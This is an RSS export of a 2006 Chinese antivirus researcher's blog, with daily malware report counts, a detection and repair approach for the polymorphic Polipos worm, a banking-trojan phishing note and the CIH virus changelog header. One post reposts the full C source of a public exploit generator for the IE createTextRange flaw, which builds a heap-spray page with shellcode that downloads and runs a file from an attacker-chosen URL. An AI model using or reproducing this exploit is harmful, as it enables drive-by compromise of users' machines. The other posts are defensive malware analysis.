<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>加糖苦咖啡 | daishuo's blog</title><link>http://blog.donews.com/daishuo/</link><description>戴硕的blog</description><dc:language>zh-CHS</dc:language><generator>.Text Version 1.0.1.0</generator><item><dc:creator>daishuo</dc:creator><title>我的博客搬家啦！</title><link>http://blog.donews.com/daishuo/archive/2006/07/15/959695.aspx</link><pubDate>Sat, 15 Jul 2006 01:24:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/07/15/959695.aspx</guid><description>&lt;p&gt;&lt;font size="4"&gt;&lt;strong&gt;已经正式落户百度空间。欢迎大家访问！&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://hi.baidu.com/daishuo"&gt;&lt;font size="4"&gt;http://hi.baidu.com/daishuo&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;img src ="http://blog.donews.com/daishuo/aggbug/959695.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>纪念4.26——CIH日</title><link>http://blog.donews.com/daishuo/archive/2006/04/26/846515.aspx</link><pubDate>Wed, 26 Apr 2006 10:02:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/04/26/846515.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/846515.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/04/26/846515.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/846515.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=846515</trackback:ping><description>&lt;p&gt;&lt;img style="WIDTH: 125px; HEIGHT: 175px" height="175" alt="cih_AUTHOR" src="http://static.flickr.com/46/135134655_f8a1fd244c_o.jpg" width="125"/&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;pre&gt;; ******************************************************************** 
; * The Virus Program Information                                    * 
; ******************************************************************** 
; *                                                                  *
; * Designer : CIH Original Place : TTIT of Taiwan                   * 
; * Create Date : 04/26/1998 Now Version : 1.2                       * 
; * Modification Time : 05/21/1998                                   * 
; *                                                                  * 
; *==================================================================* 
; * Modification History                                             * 
; *==================================================================* 
; * v1.0 1. Create the Virus Program.                                * 
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.                * 
; * 04/26/1998 3. Virus Code doesn't Reload into System.             * 
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System.     * 
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.      * 
; * 6. When System Opens Existing PE File, the File will be          * 
; * Infected, and the File doesn't be Reinfected.                    * 
; * 7. It is also Infected, even the File is Read-Only.              * 
; * 8. When the File is Infected, the Modification Date and Time     * 
; * of the File also don't be Changed.                               * 
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call      * 
; * Previous FileSystemApiHook, it will Call the Function            * 
; * that the IFS Manager Would Normally Call to Implement            * 
; * this Particular I/O Request.                                     * 
; * 10. The Virus Size is only 656 Bytes.                            * 
; *==================================================================* 
; * v1.1 1. Especially, the File that be Infected will not Increase  * 
; * it's Size... ^__^                                                * 
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.      * 
; * When Exception Error Occurs, Our OS System should be in          * 
; * Windows NT. So My Cute Virus will not Continue to Run,           * 
; * it will Jmup to Original Application to Run.                     * 
; * 3. Use Better Algorithm, Reduce Virus Code Size.                 * 
; * 4. The Virus &amp;quot;Basic&amp;quot; Size is only 796 Bytes.                     * 
; *==================================================================* 
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...        * 
; * 2. Modify the Bug of v1.1                                        * 
; * 05/21/1998 3. The Virus &amp;quot;Basic&amp;quot; Size is 1003 Bytes.              * 
; ******************************************************************** 
&lt;/pre&gt;&lt;img src ="http://blog.donews.com/daishuo/aggbug/846515.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>P2P-Worm.Win32.Polipos.a的查杀原理(初步)</title><link>http://blog.donews.com/daishuo/archive/2006/04/26/846256.aspx</link><pubDate>Wed, 26 Apr 2006 01:32:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/04/26/846256.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/846256.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/04/26/846256.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/846256.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=846256</trackback:ping><description>&lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 24号下班前，收到小陌的MSN消息，关于P2P-Worm.Win32.Polipos.a这个病毒的。惭愧得很，前2周一直在做项目开发，病毒分析工作扔下了，以致在小陌给我发信息前，都没有听说过这个病毒。病毒资料在小陌的blog上已经有了，白天我看了一下这个毒，主要目的是查杀。&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Polipos这个病毒用了变形引擎，每次感染的代码和数据都不同。我看了10分钟左右，觉得写一个搞定变形引擎的模块，工作量至少要2、3天。所以暂停了对变形代码的跟踪。在虚拟机里运行病毒，得到了几个感染样本。从感染样本中总结规律：&lt;br/&gt;1、从被感染的样本来看，比原来多了一个节，节名为8个0字节，大小不定，60K左右，节属性为0xe0000060。&lt;br/&gt;2、病毒用了EPO，替换原程序中对某个API的调用指令(call ds:[API地址])，用相对地址调用的方式(call virus_Entry)进入病毒入口函数。被替换的API是随机选择的，源程序中所有call ds:[API地址]语句都被替换了。&lt;br/&gt;3、病毒入口函数是变形的，但最初几条语句总是：&lt;br/&gt;push ebp&lt;br/&gt;mov&amp;nbsp; ebp, esp&lt;br/&gt;sub&amp;nbsp; esp, ??&lt;br/&gt;pusha&lt;/p&gt;&lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 对Polipos.a病毒进行检测，可以从下面几点入手：&lt;br/&gt;step 1、根据新增病毒节的特征，可以快速排除绝大多数正常程序；&lt;br/&gt;step 2、读取病毒节数据，根据病毒入口函数初始代码的特点，全文扫描可能的病毒入口地址；&lt;br/&gt;step 3、读取代码节(程序入口所在节)数据，全文扫描对可能病毒入口的调用语句。&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 根据后来的实验显示，step 2找到的可能入口大约在15～25个，记录这些可能入口地址的包围盒(最大最小值)可以大幅优化step 3的执行速度。step 3可能找到多个调用语句，只选取最先找到的一个(因为病毒会在代码节后面的空隙处插入代码)。&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; step 3结果不为空的样本，足以判断是病毒，误报率也应接近于0。&lt;/p&gt;&lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 通过检测模块，可以确定病毒入口地址。最基本的修复工作是：将程序中所有对病毒入口的调用语句还原成对API的调用。这里最大的难题在于，如果不搞定变形引擎，无法直接知道病毒替换了对哪个API的调用语句。&lt;br/&gt;有一种间接方案可以考虑：&lt;br/&gt;step 1、遍历Import表，记录所有API的位置；&lt;br/&gt;step 2、全文扫描代码节，记录对各个API的引用情况；&lt;br/&gt;step 3、如果step 2结果显示存在且仅存在1个未被引用的API，那么这个API就是被病毒替换的。&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 需要说明的是step 2，通常编译器生成的调用API的代码有下面3种方式：&lt;br/&gt;#1, call ds:[API地址]&lt;br/&gt;#2, mov reg32, ds:[API地址]&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; call reg32&lt;br/&gt;#3, call jmp_API&lt;br/&gt;&amp;nbsp; jmp_API:&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp ds:[API地址]&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 实验证明，对于病毒样本，step 3有时会找不到未被引用的API，这个概率接近15%。原因是编译器生成的代码中，对同一API可能应用不同方式的调用代码，而病毒替换的只是call ds:[API地址]这一种方式而已。&lt;br/&gt;约15%清除失败的概率，使得本文描述的解决方案只能成为&amp;ldquo;初步&amp;rdquo;方案。这个初步方案的最大好处是完全绕开了变形引擎，因此实现起来工作量较小。代码完成，400行左右的规模，准备随KV 4月26日上午升级入库。&lt;br/&gt;&lt;/p&gt;&lt;img src ="http://blog.donews.com/daishuo/aggbug/846256.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>昨日病毒(2006.04.03)</title><link>http://blog.donews.com/daishuo/archive/2006/04/04/811294.aspx</link><pubDate>Tue, 04 Apr 2006 12:53:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/04/04/811294.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/811294.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/04/04/811294.aspx#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/811294.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=811294</trackback:ping><description>4月3日上报次数较多的样本有：
mssave.exe -------- 562; 
extrmous.exe -------- 528; 
explore.exe -------- 497; 
guest.exe -------- 245; 
phost.exe -------- 218; 
lup.exe -------- 184; 
mssvcc.exe -------- 146; 
newname8.exe -------- 140; 
mousepad8.exe -------- 113; 
winsystems.exe -------- 108; 
keyboard8.exe -------- 71; 
 
请进入全文查看它们的技术报告。&lt;img src ="http://blog.donews.com/daishuo/aggbug/811294.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>灰鸽子和网络色情钓鱼</title><link>http://blog.donews.com/daishuo/archive/2006/04/01/805877.aspx</link><pubDate>Sat, 01 Apr 2006 02:42:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/04/01/805877.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/805877.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/04/01/805877.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/805877.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=805877</trackback:ping><description> 前些日子接到网友线报，反映有些人在QQ信息说明中打着色情交友的幌子传播病毒。当时好歹看了一下，然后就开始忙CMMI的工作，没有写到blog上。今天CMMI终于过了，突然想起这事来，补发一篇，希望能给那些用下半身思考的男性网友们提个醒，不要轻易上当 :-| 
&lt;img src ="http://blog.donews.com/daishuo/aggbug/805877.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>IE createTextRange漏洞文件下载木马生成器</title><link>http://blog.donews.com/daishuo/archive/2006/03/27/795522.aspx</link><pubDate>Mon, 27 Mar 2006 23:14:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/27/795522.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/795522.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/27/795522.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/795522.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=795522</trackback:ping><description>&lt;p&gt;IE的createTextRange漏洞已经出来几天了。这个漏洞的利用代码依然会分配大量内存，总得来说，可以远程代码执行，自然是严重等级的漏洞，但利用起来代价很大，512M内存的机器上跑的话，也需要1～2分钟才会运行shellcode，所以今后它的泛滥程度会远低于WMF/HHCTRL/MHTML等漏洞。&lt;/p&gt;&lt;p&gt;在这里，转载一个利用createTextRange漏洞的文件下载木马生成器的源码，供从事系统安全的朋友们娱乐。其实，大家可能早就&lt;a href="http://www.baidu.com/s?ie=gb2312&amp;amp;bs=%25u9090&amp;amp;sr=&amp;amp;z=&amp;amp;cl=3&amp;amp;f=8&amp;amp;wd=%25u9090+createTextRange&amp;amp;ct=0"&gt;baidu到一些&lt;/a&gt;了，呵呵。&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;textarea style="WIDTH: 518px; HEIGHT: 221px" rows="12" cols="57"&gt;/*
*
* Internet Explorer &amp;quot;createTextRang&amp;quot; Download Shellcoded Exploit
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-03-2006
* Reliable exploitation by Darkeagle of Unl0ck Research Team
* http://www.milw0rm.com/exploits/1606
*
* Affected Software: Microsoft Internet Explorer 6.x &amp;amp; 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmaca@icqmail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* Credit to Kozan,Darkeagle,delikon,Stelian Ene
*
*/

#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;

#define BUF_LEN         0x1518
#define FILE_NAME       &amp;quot;index.htm&amp;quot;

char body1[] =
	&amp;quot;&amp;lt;input type=\&amp;quot;checkbox\&amp;quot; id=\&amp;quot;blah\&amp;quot;&amp;gt;\r\n&amp;quot;
	&amp;quot;&amp;lt;SCRIPT language=\&amp;quot;javascript\&amp;quot;&amp;gt;\r\n\r\n&amp;quot;
	&amp;quot;shellcode = unescape(\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u0065&amp;quot;;

char body2[] =
        &amp;quot;\r\n\r\nbigblock = unescape(\&amp;quot;%u9090%u9090\&amp;quot;);\r\n&amp;quot;
        &amp;quot;slackspace = 20 + shellcode.length\r\n\r\n&amp;quot;
        &amp;quot;while (bigblock.length &amp;lt; slackspace)\r\n&amp;quot;
        &amp;quot;\tbigblock += bigblock;\r\n\r\n&amp;quot;
        &amp;quot;fillblock = bigblock.substring(0, slackspace);\r\n\r\n&amp;quot;
        &amp;quot;block = bigblock.substring(0, bigblock.length-slackspace);\r\n\r\n&amp;quot;
        &amp;quot;while(block.length + slackspace &amp;lt; 0x40000)\r\n&amp;quot;
        &amp;quot;\tblock = block + block + fillblock;\r\n\r\n&amp;quot;
        &amp;quot;memory = new Array();\r\n\r\n&amp;quot;
        &amp;quot;for ( i = 0; i &amp;lt; 2020; i++ )\r\n&amp;quot;
        &amp;quot;\tmemory[i] = block + shellcode;\r\n\r\n&amp;quot;
        &amp;quot;var r = document.getElementById('blah').createTextRange();\r\n\r\n&amp;quot;
        &amp;quot;&amp;lt;/script&amp;gt;\r\n&amp;quot;;


int main(int argc,char *argv[])
{
        if (argc &amp;lt; 2)
        {
                printf(&amp;quot;\nInternet Explorer \&amp;quot;createTextRang\&amp;quot; Download Shellcoded Exploit&amp;quot;);
                printf(&amp;quot;\nUsage:\n&amp;quot;);
                printf(&amp;quot; ie_exp &amp;lt;WebUrl&amp;gt;\n&amp;quot;);

                return 0;
        }

        FILE *File;
        char *pszBuffer;
        char *web = argv[1];
        char *pu = &amp;quot;%u&amp;quot;;
        char u_t[5];
        char *utf16 = (char*)malloc(strlen(web)*5);

        if ( (File = fopen(FILE_NAME,&amp;quot;w+b&amp;quot;)) == NULL ) {
                printf(&amp;quot;\n [Err:] fopen()&amp;quot;);
                exit(1);
        }

        pszBuffer = (char*)malloc(BUF_LEN);
        memcpy(pszBuffer,body1,sizeof(body1)-1);

        memset(utf16,'\0',strlen(web)*5);
        for (unsigned int i=0;i&amp;lt;strlen(web);i=i+2)
        {
                sprintf(u_t,&amp;quot;%s%.2x%.2x&amp;quot;, pu, web[i+1], web[i]);
                strcat(utf16,u_t);
        }

        strcat(pszBuffer,utf16);
        strcat(pszBuffer,&amp;quot;%u0000\&amp;quot;);&amp;quot;);
        strcat(pszBuffer,body2);

        fwrite(pszBuffer, BUF_LEN, 1,File);
        fclose(File);

        printf(&amp;quot;\n\n&amp;quot;  FILE_NAME  &amp;quot; has been created in the current directory.\n&amp;quot;);
        return 1;
}

// milw0rm.com [2006-03-23]

&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/textarea&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;img src ="http://blog.donews.com/daishuo/aggbug/795522.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>昨日病毒(2006.03.24)</title><link>http://blog.donews.com/daishuo/archive/2006/03/26/793001.aspx</link><pubDate>Sun, 26 Mar 2006 12:47:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/26/793001.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/793001.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/26/793001.aspx#Feedback</comments><slash:comments>4</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/793001.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=793001</trackback:ping><description>3月23日上报次数较多的样本如下：
icntrl.exe -------- 222； 
lup.exe -------- 149； 
mssvcc.exe -------- 130； 
wuass32.exe -------- 93； 
mssm32.exe -------- 86； 
请进入全文查看它们的技术报告。&lt;img src ="http://blog.donews.com/daishuo/aggbug/793001.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>昨日病毒(2006.03.23)</title><link>http://blog.donews.com/daishuo/archive/2006/03/24/790367.aspx</link><pubDate>Fri, 24 Mar 2006 13:05:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/24/790367.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/790367.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/24/790367.aspx#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/790367.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=790367</trackback:ping><description>3月23日上报次数较多的样本有：
newname5.exe -------- 197； 
mousepad5.exe -------- 194； 
keyboard5.exe -------- 164； 
dpnss32.exe -------- 113； 
请进入全文查看它们的分析报告。&lt;img src ="http://blog.donews.com/daishuo/aggbug/790367.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>昨日病毒(2006.03.22)</title><link>http://blog.donews.com/daishuo/archive/2006/03/24/790364.aspx</link><pubDate>Fri, 24 Mar 2006 13:03:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/24/790364.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/790364.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/24/790364.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/790364.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=790364</trackback:ping><description>3月22日上报次数较多的样本有： 
313.exe -------- 175； 
iplus.exe -------- 94； 
请进入全文查看它们的分析报告。&lt;img src ="http://blog.donews.com/daishuo/aggbug/790364.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>昨日病毒(2006.03.20)</title><link>http://blog.donews.com/daishuo/archive/2006/03/24/790359.aspx</link><pubDate>Fri, 24 Mar 2006 13:02:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/24/790359.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/790359.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/24/790359.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/790359.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=790359</trackback:ping><description>3月20日上报次数较多的样本有： 
bmnss.exe -------- 217； 
mousepad4.exe -------- 151； 
newname4.exe -------- 150； 
keyboard4.exe -------- 108； 
请进入全文查看它们的分析报告。&lt;img src ="http://blog.donews.com/daishuo/aggbug/790359.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>昨日病毒(2006.03.18)</title><link>http://blog.donews.com/daishuo/archive/2006/03/19/775267.aspx</link><pubDate>Sun, 19 Mar 2006 00:50:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/19/775267.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/775267.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/19/775267.aspx#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/775267.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=775267</trackback:ping><description>&lt;p&gt;&lt;a title="Photo Sharing" href="http://blog.donews.com/daishuo/archive/2006/03/19/775267.aspx"&gt;&lt;img height="360" alt="fake_icbc" src="http://static.flickr.com/42/114167858_c7bbc74fbf_o.png" width="500" border="0"/&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;上图是一个vb木马显示的窗口，该窗口背景图片是幅截图，就是xx网上银行的登录页面。木马监视当前用户窗口的标题文字，一旦发现用户正在使用IE浏览器登录此页面，立即关闭IE窗口，并弹出自己的虚假登录窗口，诱骗用户在木马窗口上输入卡号和密码。随即把截到的内容发送至病毒作者信箱。 &lt;/p&gt;&lt;img src ="http://blog.donews.com/daishuo/aggbug/775267.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>昨日病毒(2006.03.16-03.17)</title><link>http://blog.donews.com/daishuo/archive/2006/03/19/775257.aspx</link><pubDate>Sun, 19 Mar 2006 00:40:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/19/775257.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/775257.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/19/775257.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/775257.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=775257</trackback:ping><description>3月16和3月17日,上报较多的样本都是变种: 3.16日，lup.exe 121次上报；mssvcc.exe 96次上报；3.17日，newname3.exe 429次上报；mousepad3.exe 401次上报；keyboard3.exe 337次上报.
请进入全文查看它们的技术分析报告.&lt;img src ="http://blog.donews.com/daishuo/aggbug/775257.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>昨日病毒(2006.03.15)</title><link>http://blog.donews.com/daishuo/archive/2006/03/16/771491.aspx</link><pubDate>Thu, 16 Mar 2006 17:08:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/16/771491.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/771491.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/16/771491.aspx#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/771491.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=771491</trackback:ping><description>昨天上报次数较多的样本及其上报次数列表如下：
winscntrl.exe ---- 276;  
Windows-fix.exe ---- 120;  
~bNvD5b.exe ---- 110;  
win32ssr.exe ---- 39;  
请进入全文查看它们的技术报告。&lt;img src ="http://blog.donews.com/daishuo/aggbug/771491.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>FrSIRT Exploit关闭了</title><link>http://blog.donews.com/daishuo/archive/2006/03/16/770832.aspx</link><pubDate>Thu, 16 Mar 2006 11:18:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/16/770832.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/770832.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/16/770832.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/770832.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=770832</trackback:ping><description>&lt;P&gt;昨晚上bloglines看东西，发现&lt;A href='http://www.frsirt.com/exploits/" target="_blank'&gt;FrSIRT Exploit&lt;/A&gt;有1条更新，还以为是跟MS06-012有关的PoC代码出来了，结果却是这么一条消息：&lt;/P&gt;
&lt;P align=center&gt;&lt;FONT style="FONT-SIZE: 8pt" face=Verdana&gt;Exploits and PoCs are available to &lt;/FONT&gt;&lt;A href="http://www.frsirt.com/english/services/"&gt;&lt;FONT color=#000020&gt;&lt;FONT style="FONT-SIZE: 8pt" face=Verdana&gt;&lt;B&gt;FrSIRT VNS&lt;/B&gt;&lt;/FONT&gt;&lt;FONT face=Verdana size=1&gt;&lt;B&gt;?/b&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;FONT style="FONT-SIZE: 8pt" face=Verdana&gt; subscribers only.&lt;BR&gt;&lt;BR&gt;Public exploits section has been definitively closed.&lt;BR&gt; &lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
&lt;P align=left&gt;&lt;FONT face=Verdana&gt;FrSIRT Exploits收费了，通过它的&lt;A href='http://www.frsirt.com/english/services/" target="_blank'&gt;FrSIRT Vulnerability Notification Services&lt;/A&gt;。&lt;/FONT&gt;&lt;/P&gt;
&lt;P align=left&gt;&lt;IMG height=62 src="http://www.k-otik.com/images/kotik46860.gif" width=473&gt;&lt;/P&gt;&lt;!--AD_Link_Data_Begin--&gt;&lt;p align="center"&gt;&lt;span style="font-size: 0.8em"&gt;本篇文章使用&lt;a href="http://www.aigaogao.com/blogeditor/index.html" target="_blank"&gt;aigaogao&lt;/a&gt; Blog软件发布, &lt;a href="http://www.aigaogao.com/blogeditor/download.html" target="_blank"&gt;“我的Blog要备份”&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;!--AD_Link_Data_End--&gt;&lt;img src ="http://blog.donews.com/daishuo/aggbug/770832.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>daishuo</dc:creator><title>昨日病毒(2006.03.14)</title><link>http://blog.donews.com/daishuo/archive/2006/03/15/769869.aspx</link><pubDate>Wed, 15 Mar 2006 19:43:00 GMT</pubDate><guid>http://blog.donews.com/daishuo/archive/2006/03/15/769869.aspx</guid><wfw:comment>http://blog.donews.com/daishuo/comments/769869.aspx</wfw:comment><comments>http://blog.donews.com/daishuo/archive/2006/03/15/769869.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/daishuo/comments/commentRss/769869.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=769869</trackback:ping><description>&lt;P&gt;昨天（2006.03.14）收到的病毒样本，总体来说，没有什么新鲜的东东。sys.exe、mssvcc.exe和lup.exe，是3个上报次数超过100的高波变种(Backdoor/Agobot)，技术上和以前的变种没有什么变化，可以参考&lt;A href="http://blog.donews.com/daishuo/archive/2006/03/14/768215.aspx"&gt;昨日病毒(2006.03.13) &lt;/A&gt;。&lt;/P&gt;
&lt;P&gt;在上报次数排行榜前3位的样本文件分别是：&lt;/P&gt;
&lt;P&gt;~DF44.tmp.exe ---- 4891&lt;BR&gt;SSAddr1.dll ---- 697&lt;BR&gt;stup.exe ---- 568&lt;/P&gt;
